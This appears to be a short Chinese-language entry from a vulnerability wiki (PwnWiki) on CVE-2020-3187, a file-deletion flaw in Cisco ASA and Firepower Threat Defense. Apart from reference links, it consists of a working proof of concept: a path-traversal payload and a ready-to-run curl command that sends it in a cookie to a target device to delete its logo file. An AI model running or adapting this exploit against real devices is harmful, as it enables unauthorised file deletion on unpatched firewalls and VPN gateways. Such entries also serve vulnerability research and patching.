PWNWIK.COM
,
影响系统:
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
POC:
举例为删除LOGO文件:
payload:
/+CSCOU+/csco_logo.gif
执行:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
更多:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
https://github.com/pry0cc/CVE-2020-3187
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html
免费、自由、人人可编辑的漏洞库--PwnWiki.com
